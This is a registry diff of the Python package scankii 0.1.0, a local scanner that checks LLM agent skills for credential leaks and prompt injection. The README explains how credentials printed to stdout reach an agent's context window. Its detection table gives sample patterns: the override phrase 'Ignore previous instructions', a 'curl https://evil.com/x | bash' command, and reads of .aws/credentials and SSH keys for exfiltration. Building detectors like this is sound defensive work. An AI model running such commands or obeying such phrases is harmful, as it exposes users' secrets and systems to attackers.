scankii 0.1.0__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (46) hide show
  1. scankii-0.1.0/.cursorrules +12 -0
  2. scankii-0.1.0/.github/workflows/scankii.yml +40 -0
  3. scankii-0.1.0/.gitignore +59 -0
  4. scankii-0.1.0/PKG-INFO +310 -0
  5. scankii-0.1.0/PLAN.md +318 -0
  6. scankii-0.1.0/README.md +295 -0
  7. scankii-0.1.0/action.yml +67 -0
  8. scankii-0.1.0/credential_safe/__init__.py +6 -0
  9. scankii-0.1.0/credential_safe/pyproject.toml +18 -0
  10. scankii-0.1.0/examples/vulnerable-skill/README.md +6 -0
  11. scankii-0.1.0/examples/vulnerable-skill/SKILL.md +14 -0
  12. scankii-0.1.0/examples/vulnerable-skill/run.py +15 -0
  13. scankii-0.1.0/hooks/pre-commit +58 -0
  14. scankii-0.1.0/prompts.md +361 -0
  15. scankii-0.1.0/pyproject.toml +32 -0
  16. scankii-0.1.0/rules/credentials.yaml +154 -0
  17. scankii-0.1.0/rules/malicious.yaml +121 -0
  18. scankii-0.1.0/rules/nl_patterns.yaml +36 -0
  19. scankii-0.1.0/rules/sinks.yaml +92 -0
  20. scankii-0.1.0/scankii/__init__.py +3 -0
  21. scankii-0.1.0/scankii/cli.py +68 -0
  22. scankii-0.1.0/scankii/core/__init__.py +1 -0
  23. scankii-0.1.0/scankii/core/ast_analyzer.py +388 -0
  24. scankii-0.1.0/scankii/core/cross_modal.py +131 -0
  25. scankii-0.1.0/scankii/core/nl_analyzer.py +163 -0
  26. scankii-0.1.0/scankii/core/patterns.py +101 -0
  27. scankii-0.1.0/scankii/core/scorer.py +146 -0
  28. scankii-0.1.0/scankii/output/__init__.py +1 -0
  29. scankii-0.1.0/scankii/output/cli_reporter.py +128 -0
  30. scankii-0.1.0/scankii/output/explain.py +227 -0
  31. scankii-0.1.0/scankii/output/json_reporter.py +22 -0
  32. scankii-0.1.0/scankii/output/sarif.py +218 -0
  33. scankii-0.1.0/scankii/runtime/__init__.py +1 -0
  34. scankii-0.1.0/scankii/runtime/safe_logger.py +142 -0
  35. scankii-0.1.0/scankii/scanner.py +228 -0
  36. scankii-0.1.0/templates/SKILL.md.template +71 -0
  37. scankii-0.1.0/tests/__init__.py +1 -0
  38. scankii-0.1.0/tests/test_ast_analyzer.py +179 -0
  39. scankii-0.1.0/tests/test_cli.py +33 -0
  40. scankii-0.1.0/tests/test_cross_modal.py +151 -0
  41. scankii-0.1.0/tests/test_explain.py +52 -0
  42. scankii-0.1.0/tests/test_nl_analyzer.py +140 -0
  43. scankii-0.1.0/tests/test_patterns.py +155 -0
  44. scankii-0.1.0/tests/test_safe_logger.py +135 -0
  45. scankii-0.1.0/tests/test_scanner.py +78 -0
  46. scankii-0.1.0/tests/test_scorer.py +156 -0
@@ -0,0 +1,12 @@
1
+ This is a Python CLI security tool called scankii.
2
+ It scans LLM agent skill directories for credential leakage.
3
+ It analyzes both natural language (SKILL.md) and source code together.
4
+ It uses tree-sitter for AST analysis.
5
+ It uses the rich library for all terminal output.
6
+ Always write type hints on every function.
7
+ Always write docstrings on every function.
8
+ Always write a corresponding test in /tests for every module.
9
+ Keep every function under 40 lines.
10
+ No external LLM API calls anywhere in the codebase.
11
+ No unnecessary dependencies.
12
+ Credential patterns live in rules/ YAML files, never hardcoded in Python.
@@ -0,0 +1,40 @@
1
+ name: scankii CI
2
+
3
+ on:
4
+ push:
5
+ branches: [main]
6
+ pull_request:
7
+ branches: [main]
8
+
9
+ jobs:
10
+ test:
11
+ runs-on: ubuntu-latest
12
+ strategy:
13
+ matrix:
14
+ python-version: ["3.11"]
15
+
16
+ steps:
17
+ - name: Checkout
18
+ uses: actions/checkout@v4
19
+
20
+ - name: Set up Python ${{ matrix.python-version }}
21
+ uses: actions/setup-python@v5
22
+ with:
23
+ python-version: ${{ matrix.python-version }}
24
+
25
+ - name: Install dependencies
26
+ run: |
27
+ python -m pip install --upgrade pip
28
+ pip install -e ".[dev]"
29
+ pip install pytest-cov
30
+
31
+ - name: Run tests with coverage
32
+ run: |
33
+ pytest tests/ -v --cov=scankii --cov-report=term-missing --cov-fail-under=80
34
+
35
+ - name: Upload coverage
36
+ if: always()
37
+ uses: actions/upload-artifact@v4
38
+ with:
39
+ name: coverage-report
40
+ path: htmlcov/
@@ -0,0 +1,59 @@
1
+ # Byte-compiled / optimized / DLL files
2
+ __pycache__/
3
+ *.py[cod]
4
+ *$py.class
5
+
6
+ # C extensions
7
+ *.so
8
+
9
+ # Distribution / packaging
10
+ .Python
11
+ build/
12
+ develop-eggs/
13
+ dist/
14
+ downloads/
15
+ eggs/
16
+ .eggs/
17
+ lib/
18
+ lib64/
19
+ parts/
20
+ sdist/
21
+ var/
22
+ wheels/
23
+ *.egg-info/
24
+ .installed.cfg
25
+ *.egg
26
+ MANIFEST
27
+
28
+ # Unit test / coverage reports
29
+ htmlcov/
30
+ .tox/
31
+ .nox/
32
+ .coverage
33
+ .coverage.*
34
+ .cache
35
+ nosetests.xml
36
+ coverage.xml
37
+ *.cover
38
+ *.py,cover
39
+ .hypothesis/
40
+ .pytest_cache/
41
+
42
+ # Environments
43
+ .env
44
+ .venv
45
+ env/
46
+ venv/
47
+ ENV/
48
+ env.bak/
49
+ venv.bak/
50
+
51
+ # scankii specific generated reports
52
+ findings.json
53
+ findings.sarif
54
+
55
+ # IDEs and Editors
56
+ .idea/
57
+ .vscode/
58
+ *.swp
59
+ *.swo
scankii-0.1.0/PKG-INFO ADDED
@@ -0,0 +1,310 @@
1
+ Metadata-Version: 2.4
2
+ Name: scankii
3
+ Version: 0.1.0
4
+ Summary: Scan LLM agent skill directories for credential leakage
5
+ Requires-Python: >=3.10
6
+ Requires-Dist: click
7
+ Requires-Dist: pyyaml
8
+ Requires-Dist: rich
9
+ Requires-Dist: tree-sitter
10
+ Requires-Dist: tree-sitter-javascript
11
+ Requires-Dist: tree-sitter-python
12
+ Provides-Extra: dev
13
+ Requires-Dist: pytest; extra == 'dev'
14
+ Description-Content-Type: text/markdown
15
+
16
+ # scankii
17
+
18
+ **The Open-Source, Local-First Semgrep for AI Agent Skills.**
19
+
20
+ `scankii` is a specialized static analysis tool designed to detect credential leaks, prompt injections, and cross-modal vulnerabilities in AI agent skills before they are deployed.
21
+
22
+ Unlike traditional secret scanners that only inspect source code, `scankii` understands the agent execution model. It analyzes both your **Natural Language instructions (`SKILL.md`)** and your **source code** together as a single unit to catch complex, multi-stage credential exposures that other tools miss.
23
+
24
+ ---
25
+
26
+ ## The Problem: Cross-Modal Leakage
27
+
28
+ In modern LLM agent architectures, agents read natural language instructions and execute code. This creates a unique vulnerability:
29
+
30
+ 1. **The Code is "Safe":** The source code might securely read an API key from the environment and use it.
31
+ 2. **The Markdown is "Safe":** The `SKILL.md` might benignly explain how to use the skill.
32
+ 3. **The Intersection is Vulnerable:** If the `SKILL.md` instructs the agent to pass a credential to a function, and that function prints it for debugging, the agent framework captures that `stdout` and injects it back into the LLM context window. The secret is now exposed to prompt injection attacks.
33
+
34
+ `scankii` is the first open-source scanner purpose-built to detect these cross-modal vulnerabilities.
35
+
36
+ ---
37
+
38
+ ## How scankii works
39
+
40
+ `scankii` employs a dual-engine static analysis pipeline to evaluate both the instructional and executable components of an agent skill simultaneously.
41
+
42
+ ```mermaid
43
+ graph TD
44
+ subgraph "scankii Pipeline"
45
+ direction TB
46
+
47
+ subgraph "1. Static Analysis"
48
+ A[SKILL.md] -->|Natural Language| B[NLP Semantic Analyzer]
49
+ C[Source Code] -->|AST Parsing| D[AST Syntax Analyzer]
50
+ end
51
+
52
+ subgraph "2. Cross-Modal Correlation"
53
+ B -->|Extracted Intents| E{Cross-Modal Engine}
54
+ D -->|Variable Sinks| E
55
+ end
56
+
57
+ subgraph "3. Scoring & Reporting"
58
+ E -->|Unmatched Findings| F[Scorer]
59
+ E -->|Correlated Leaks| F
60
+ F -->|Severity Assessment| G[Reporters]
61
+ end
62
+ end
63
+
64
+ G --> H((Terminal UI))
65
+ G --> I((JSON))
66
+ G --> J((SARIF))
67
+
68
+ style A fill:#f9f,stroke:#333,stroke-width:2px
69
+ style C fill:#bbf,stroke:#333,stroke-width:2px
70
+ style E fill:#f96,stroke:#333,stroke-width:2px
71
+ ```
72
+
73
+ 1. **NLP Semantic Analyzer:** Uses constrained pattern matching to scan `SKILL.md` for prompt injections, social engineering, and instructions that mandate the passing of credentials.
74
+ 2. **AST Syntax Analyzer:** Parses the source code to build an Abstract Syntax Tree. It tracks variables and detects if they flow into dangerous sinks like `print()`, file I/O, or unauthenticated network requests.
75
+ 3. **Cross-Modal Engine:** Correlates findings from both engines. If the `SKILL.md` instructs passing an API key, and the code prints that parameter to stdout, the engine escalates it as a high-severity cross-modal leak.
76
+ 4. **Scorer:** Applies a multiplicative scoring model based on exploitability, channel risk, and credential type to determine the final severity (LOW to CRITICAL).
77
+
78
+ ---
79
+
80
+ ## Demo
81
+
82
+ ```
83
+ $ scankii scan examples/vulnerable-skill --explain
84
+
85
+ ┏━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━┓
86
+ ┃ File ┃ Line ┃ Pattern ┃ Channel ┃ Severity ┃
87
+ ┡━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━┩
88
+ │ run.py │ 7 │ Cross-Modal Leak │ stdout │ MEDIUM │
89
+ │ run.py │ 9 │ Cross-Modal Leak │ network │ CRITICAL │
90
+ │ run.py │ 7 │ Cross-Modal Leak │ stdout │ MEDIUM │
91
+ │ run.py │ 9 │ Cross-Modal Leak │ network │ CRITICAL │
92
+ │ run.py │ 7 │ Cross-Modal Leak │ stdout │ MEDIUM │
93
+ │ run.py │ 9 │ Cross-Modal Leak │ network │ CRITICAL │
94
+ └────────┴──────┴──────────────────┴─────────┴──────────┘
95
+
96
+ Total: 6 (CRITICAL: 3, MEDIUM: 3)
97
+
98
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
99
+ 🚨 CRITICAL — Information Exposure via network
100
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
101
+
102
+ Pattern: Information Exposure
103
+ Channel: network
104
+ File: run.py, line 9
105
+ Score: 5.04
106
+
107
+ Attack Flow:
108
+ SKILL.md [line 1] ← instructs agent to pass api_key to execute()
109
+
110
+ execute(api_key) [run.py:9] ← credential enters function
111
+
112
+ requests.get(api_key) [run.py] ← sinks to network
113
+
114
+ network ← exfiltrated externally
115
+
116
+ LLM context window ← credential now queryable via natural language
117
+
118
+ Suggested Fix:
119
+ Replace: hardcoded credential in network call
120
+ With: Read credential from environment variable
121
+ import os
122
+ api_key = os.environ.get('API_KEY')
123
+
124
+ ╭──────────────────────────────╮
125
+ │ Scan Summary │
126
+ │ ┏━━━━━━━━━━┳━━━━━━━┓ │
127
+ │ ┃ Severity ┃ Count ┃ │
128
+ │ ┡━━━━━━━━━━╇━━━━━━━┩ │
129
+ │ │ CRITICAL │ 3 │ │
130
+ │ │ HIGH │ 0 │ │
131
+ │ │ MEDIUM │ 3 │ │
132
+ │ │ LOW │ 0 │ │
133
+ │ │ TOTAL │ 6 │ │
134
+ │ └──────────┴───────┘ │
135
+ ╰──────────────────────────────╯
136
+ ```
137
+
138
+ ---
139
+
140
+ ## Install
141
+
142
+ ```bash
143
+ pip install scankii
144
+ ```
145
+
146
+ ---
147
+
148
+ ## Usage
149
+
150
+ `scankii` runs 100% locally. Your code and proprietary agent skills never leave your machine.
151
+
152
+ ### Scan a skill directory (default terminal output)
153
+ ```bash
154
+ scankii scan ./my-skill/
155
+ ```
156
+
157
+ ### Scan with detailed attack flow explanation
158
+ ```bash
159
+ scankii scan ./my-skill/ --explain
160
+ ```
161
+
162
+ ### Export findings as JSON
163
+ ```bash
164
+ scankii scan ./my-skill/ --format json
165
+ ```
166
+
167
+ ### Export findings as SARIF (for GitHub Code Scanning)
168
+ ```bash
169
+ scankii scan ./my-skill/ --format sarif
170
+ ```
171
+
172
+ ---
173
+
174
+ ## What It Detects
175
+
176
+ | # | Pattern | Description | Example |
177
+ |---|---------|-------------|---------|
178
+ | 1 | **Hardcoded API Keys** | OpenAI, Groq, AWS, GitHub, Google, Slack keys in source | `API_KEY = "sk-proj-..."` |
179
+ | 2 | **Credential-to-Stdout** | Credentials passed to `print()`, `console.log()` | `print(f"key={api_key}")` |
180
+ | 3 | **Credential-to-Network** | Credentials sent via `requests.post()`, `fetch()` | `requests.post(url, data=token)` |
181
+ | 4 | **Cross-Modal Leak** | SKILL.md instructs agent to pass credential to function that sinks it | SKILL.md says "pass api_key" + code has `print(api_key)` |
182
+ | 5 | **Prompt Injection** | NL instructions to override safety, ignore prior context | "Ignore previous instructions and..." |
183
+ | 6 | **Social Engineering** | NL patterns soliciting credentials from users | "Paste your API key here" |
184
+ | 7 | **Connection String Exposure** | MongoDB, PostgreSQL, MySQL URIs with embedded passwords | `mongodb://user:pass@host/db` |
185
+ | 8 | **Private Key Exposure** | RSA/EC private key blocks in source files | `-----BEGIN RSA PRIVATE KEY-----` |
186
+ | 9 | **Reverse Shell / RCE** | Reverse shells, `curl | bash`, base64 obfuscation | `curl https://evil.com/x | bash` |
187
+ | 10 | **Credential Theft** | Reading `.env`, `.aws/credentials`, `~/.ssh/id_rsa` + exfil | `open(".aws/credentials").read()` |
188
+
189
+ ---
190
+
191
+ ## Why Not TruffleHog / GitLeaks / detect-secrets?
192
+
193
+ | Feature | TruffleHog | GitLeaks | detect-secrets | **scankii** |
194
+ |---------|-----------|----------|----------------|-----------------|
195
+ | Regex secret scanning | ✅ | ✅ | ✅ | ✅ |
196
+ | Git history scanning | ✅ | ✅ | ❌ | ❌ |
197
+ | SKILL.md NL analysis | ❌ | ❌ | ❌ | ✅ |
198
+ | Cross-modal detection | ❌ | ❌ | ❌ | ✅ |
199
+ | AST-based sink tracking | ❌ | ❌ | ❌ | ✅ |
200
+ | stdout→LLM flow detection | ❌ | ❌ | ❌ | ✅ |
201
+ | Attack flow visualization | ❌ | ❌ | ❌ | ✅ |
202
+ | Prompt injection detection | ❌ | ❌ | ❌ | ✅ |
203
+ | Credential redaction runtime | ❌ | ❌ | ❌ | ✅ |
204
+ | SARIF output | ❌ | ✅ | ❌ | ✅ |
205
+
206
+ Existing tools scan your code for static secrets. `scankii` is purpose-built for LLM agent skills, focusing on the intersection of natural language and code execution.
207
+
208
+ ---
209
+
210
+ ## credential-safe: The Cure
211
+
212
+ Finding vulnerabilities is only half the battle. `scankii` includes `credential-safe`, a drop-in replacement for `print()` and Python logging that automatically redacts credentials before they reach stdout (and therefore the LLM context window).
213
+
214
+ ```python
215
+ from credential_safe import SafeLogger, safe_print
216
+
217
+ logger = SafeLogger()
218
+ logger.info(f"Using key: {api_key}")
219
+ # Output: INFO: Using key: sk-[REDACTED]
220
+
221
+ safe_print(f"Token: {token}")
222
+ # Output: Token: ghp-[REDACTED]
223
+ ```
224
+
225
+ ```bash
226
+ pip install credential-safe
227
+ ```
228
+
229
+ ---
230
+
231
+ ## Enterprise Integrations
232
+
233
+ ### GitHub Action
234
+
235
+ Add to your workflow to scan skills on every PR and upload results to GitHub Code Scanning:
236
+
237
+ ```yaml
238
+ name: Skill Guard
239
+ on: [push, pull_request]
240
+
241
+ jobs:
242
+ scan:
243
+ runs-on: ubuntu-latest
244
+ steps:
245
+ - uses: actions/checkout@v4
246
+ - uses: scankii/scankii@v1
247
+ with:
248
+ path: ./skills/
249
+ severity-threshold: high
250
+ sarif-upload: true
251
+ fail-on-findings: true
252
+ ```
253
+
254
+ ### Pre-commit Hook
255
+
256
+ Stop secrets from being committed locally. Add to `.pre-commit-config.yaml`:
257
+
258
+ ```yaml
259
+ repos:
260
+ - repo: https://github.com/scankii/scankii
261
+ rev: v0.1.0
262
+ hooks:
263
+ - id: scankii
264
+ name: scankii
265
+ entry: hooks/pre-commit
266
+ language: script
267
+ types: [file]
268
+ files: '\.(md|py|js|ts)$'
269
+ ```
270
+
271
+ ---
272
+
273
+ ## Using the Secure Template
274
+
275
+ Copy our hardened SKILL.md template to start building a new skill securely from day one:
276
+
277
+ ```bash
278
+ cp templates/SKILL.md.template my-new-skill/SKILL.md
279
+ ```
280
+
281
+ The template includes:
282
+ - Inline security comments explaining what NOT to do
283
+ - Correct credential handling patterns (environment variables only)
284
+ - A security checklist to verify before publishing
285
+
286
+ ---
287
+
288
+ ## Contributing
289
+
290
+ 1. Fork the repository
291
+ 2. Create a feature branch: `git checkout -b feature/my-feature`
292
+ 3. Write tests for your changes
293
+ 4. Ensure all tests pass: `pytest tests/ -v`
294
+ 5. Run scankii on the repo: `scankii scan .`
295
+ 6. Submit a pull request
296
+
297
+ ### Development Setup
298
+
299
+ ```bash
300
+ git clone https://github.com/scankii/scankii.git
301
+ cd scankii
302
+ pip install -e ".[dev]"
303
+ pytest tests/ -v
304
+ ```
305
+
306
+ ---
307
+
308
+ ## License
309
+
310
+ MIT